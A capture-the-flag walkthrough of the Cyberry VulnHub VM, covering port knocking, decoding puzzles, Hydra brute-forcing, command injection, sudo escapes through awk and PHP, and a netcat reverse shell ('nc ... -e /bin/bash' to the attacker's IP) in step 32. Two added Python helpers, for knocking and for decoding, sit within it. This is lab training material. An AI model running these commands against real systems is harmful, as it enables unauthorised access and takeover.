Saturday 16 February 2019


Solve the Cyberry Vulnhub in 36 Steps


This article walks through the steps I used to solve the Cyberry vulnerable VM, which can be downloaded from https://www.vulnhub.com/entry/cyberry-1,217/

Tools used in this game
  • Kali 64bits (192.168.187.135)
  • netdiscover
  • NMAP
  • Python
  • Knock
  • Nikto
  • Hydra
  • Netcat
  • crunch

1) Download Cyberry from VulnHub and start it in any VM client. VMware Workstation 15 was used for this walkthrough.



2) First of all, we need to find the address of the target Cyberry machine. We can use the Linux command netdiscover



or another Linux command, nmap -sn 192.168.187.1/24



3) Got basic information about the server using nmap -sV 192.168.187.129

4) An Apache web server was found, so I visited the website



5) Viewed the source code and found base64-encoded text; tried to decode it, but there was nothing to see

   Decode the text using the Linux command



 Decoded the 10101 binary string using the following script and found an image file, boss.gif, but there was nothing inside.






6) Quickly checked the site for vulnerabilities using nikto

     A login page was found, but SQL injection and other injection techniques did not work on this login page



7) Viewed the source code of this login page and found another page on the website

     Visit http://192.168.187.129/berrypedia.html


8) View the source (view-source:http://192.168.187.129/berrypedia.html); one image file name is slightly different: placeho1der.jpg








Download the image 



9) Didn't know what to do with this image, so I googled for the solution.
After googling, it turned out these four guys are famous singers in the US; they all sang the same song, “I Hear You Knocking”, and the release dates of the song are 1970, 1955, 1955 and 1961.

This suggests port knocking is applied on the server

10) Install knock (apt-get install knockd) and try to knock the ports




11) Scanned all ports of the target machine again using nmap -p- after the knock. Alternatively, instead of the "knock" command, a simple Python program can be prepared for knocking the ports



or use the knock Linux command as below; if the port does not open, restart the Cyberry VM


A new high port was found: 61955
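The "simple python program" mentioned in step 11 is not shown in the post, so here is an added example of a minimal port-knock client (my code, not the author's script). It assumes the daemon on the VM watches for TCP SYNs, which is the knockd default; the target address and the four-year sequence are the ones used in this walkthrough, and the port_open check at the end is what confirms the knock actually worked before re-running nmap.

```python
# Added example (not the walkthrough author's script): a minimal port-knock
# client, equivalent to the "knock" command used above.
# Assumptions: the knock daemon watches for TCP SYNs (the knockd default) and
# the sequence is the four release years from the image.
import socket
import time

TARGET = "192.168.187.129"            # target VM address used in this walkthrough
YEARS = "1970 1955 1955 1961"         # knock sequence taken from the song release dates


def parse_sequence(text: str) -> list[int]:
    """Turn a whitespace- or comma-separated list of ports into ints, validating the range."""
    ports = []
    for token in text.replace(",", " ").split():
        port = int(token)
        if not 1 <= port <= 65535:
            raise ValueError(f"port {port} out of range")
        ports.append(port)
    if not ports:
        raise ValueError("empty knock sequence")
    return ports


def knock(host: str, ports: list[int], delay: float = 0.3, timeout: float = 0.5) -> list[int]:
    """Send one TCP connection attempt to each port, in order.
    The knock ports are expected to be closed, so connect_ex normally fails;
    the SYN itself is what the daemon sees. Returns the ports that were attempted."""
    attempted = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect_ex((host, port))  # result ignored: refused/timeout is the normal case
        attempted.append(port)
        time.sleep(delay)  # the daemon needs the knocks in order; a short gap keeps them distinct
    return attempted


def port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Check whether a port now accepts a TCP connection, to confirm the knock worked."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


if __name__ == "__main__":
    seq = parse_sequence(YEARS)
    knock(TARGET, seq)
    # 61955 is the port that appeared after the knock in this walkthrough
    print("61955 open:", port_open(TARGET, 61955))
```

The delay between knocks matters: knockd tracks the sequence per source address and expects the ports in order within seq_timeout, so sending all four SYNs at once from a busy client can make them arrive out of order and silently reset the sequence, which is the usual reason a knock "does not work" and the author falls back to restarting the VM.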

12) Assessed the newly found website and searched for anything inside

13) Got an idea from http://192.168.187.129:61955/H; we opened it and found Brainfuck-encoded strings

14) This is Brainfuck-encoded text; decode it using an online decoder such as https://www.dcode.fr/brainfuck-language. The result was:


team members
chuck
halle
nick
terry
mary
kerry

pw: bakeoff
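Steps 5 and 14 both lean on decoders (a base64 one-liner, an unshown script for the 10101 string, and an online Brainfuck page). As an added example that is not part of the original post, here is one self-contained Python helper covering all three, so the decoding can be done offline; the sample inputs at the bottom are constructed for this example and are not the strings from the VM.

```python
# Added example (not the walkthrough author's script): offline helpers for the
# three encodings met in this walkthrough -- base64 text in page source (step 5),
# a string of 1s and 0s (step 5) and a Brainfuck program (step 14).
import base64


def decode_base64(text: str) -> bytes:
    """Decode base64, tolerating whitespace and stripped '=' padding."""
    cleaned = "".join(text.split())
    cleaned += "=" * (-len(cleaned) % 4)  # restore padding if it was removed
    return base64.b64decode(cleaned, validate=True)


def decode_binary(bits: str, width: int = 8) -> str:
    """Turn a run of 1s and 0s (spaces/newlines ignored) into ASCII, 8 bits per char."""
    digits = "".join(ch for ch in bits if ch in "01")
    if len(digits) % width:
        raise ValueError(f"bit string length {len(digits)} is not a multiple of {width}")
    return "".join(chr(int(digits[i:i + width], 2)) for i in range(0, len(digits), width))


def run_brainfuck(program: str, stdin: bytes = b"", max_steps: int = 1_000_000) -> str:
    """Minimal Brainfuck interpreter: 8-bit wrapping cells, growable tape, and a
    bracket map built up front so unbalanced programs are rejected before running."""
    code = [c for c in program if c in "<>+-.,[]"]  # everything else is a comment
    jump = {}
    stack = []
    for pos, c in enumerate(code):
        if c == "[":
            stack.append(pos)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at instruction {pos}")
            start = stack.pop()
            jump[start], jump[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at instruction {stack[-1]}")

    tape = bytearray(30_000)
    ptr = pc = steps = 0
    inp = list(stdin)
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded (runaway loop?)")
        c = code[pc]
        if c == ">":
            ptr += 1
            if ptr == len(tape):
                tape.extend(b"\0" * 1000)
        elif c == "<":
            if ptr == 0:
                raise IndexError("tape pointer moved below cell 0")
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = inp.pop(0) if inp else 0
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return out.decode("latin-1")


# Constructed samples (not from the VM) so the helpers can be exercised offline.
SAMPLE_B64 = "aGVsbG8gYmVycnk"                       # "hello berry" with padding stripped
SAMPLE_BITS = "01100010 01101111 01110011 01110011"   # "boss"
SAMPLE_BF = "++++++++[>+++++++++<-]>.>++++++++++[>++++++++++<-]>+++++."  # prints "Hi"

if __name__ == "__main__":
    print(decode_base64(SAMPLE_B64))
    print(decode_binary(SAMPLE_BITS))
    print(run_brainfuck(SAMPLE_BF))
```

The interpreter ignores every non-command character, so the Brainfuck block can be pasted straight out of the page source with its surrounding HTML whitespace; the step limit stops a malformed or hostile program from hanging the terminal.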

15) Used this information to log on to the previously found login page, but it did not work.


16) Tried to log in with FTP or SSH, as the ports were open, using Hydra

17) FTP login worked with the "mary" account


18) After logging in with the mary account, a reminder.enc file was found, which was protected by openssl with a salted password. At the same time, the .trash file contained some common passwords that "mary" used

19) Tried to decrypt the reminder.enc file with every cipher and every candidate password:

    # iterate over every cipher openssl knows (names are printed with a leading '-')
    for i in $(openssl enc -ciphers | tail -n +2); do
        # try every candidate password recovered from .trash
        for j in $(cat opensslPass.txt); do
            # ${i:1} strips the leading '-' so the cipher name can be used as a subcommand
            openssl ${i:1} -d -salt -md md5 -in reminder.enc -out "dec$i$j" -k $j
        done
    done 2>/dev/null

20) Got the file: one of the decrypted outputs was readable ASCII


21) Tried this login on the previously found page; after several tries the credential was [mary:dangleberry69]


22) Found a page by visiting the "ub3r-s3cur3 section" link, which looked like it had a command injection flaw

23) Tried the command injection by brute force, after starting a netcat listener on my Kali.
 Finally the remote shell connection was established.

24) Used Python to upgrade the reverse shell to a proper TTY: python -c 'import pty; pty.spawn("/bin/bash")'

25) Checked the files available in the directory and found a readable file

26) Used the Python SSH Brute Forcer with this password file and the user list found previously.
https://github.com/R4stl1n/SSH-Brute-Forcer

python SSHBruteForce.py -i 192.168.187.129 -d True -p 2222 -U ./usernames.txt -P ./passwords.txt -t 15 -T 30

Or we can use hydra
hydra -L user.txt -P password.txt -f ssh://192.168.187.129

27) SSHed to the target as "nick" and looked around his home directory; found that invoke.sh could not be accessed directly, but nick can sudo as terry to access it.


28) Used sudo as the terry account to access invoke.sh

29) Could read invoke.sh now, but there was nothing special inside. Checked again whether any other account could be used with sudo


30) halle can run awk via sudo, so let's try to escape to a shell -> sudo -u halle awk 'BEGIN { system("/bin/sh") }'




31) Checked the sudo list again and found user “chuck”

32) PHP can also be used to escape to a shell

Set up the netcat listener on my Kali
Run the shell command

sudo -u chuck /usr/bin/php -r 'shell_exec("/bin/nc 192.168.187.136 443 -e /bin/bash");'
Got the shell
sudo -l did not work this time


33) Checked chuck's home directory
Found an email; the answer was there

34) The password starts with “che”, ends with “rry”, has “baca” in between, and is 15 characters long in total. Used crunch to generate all possible values
35) Used Hydra again to check the root password
36) I got it


The Answer.....
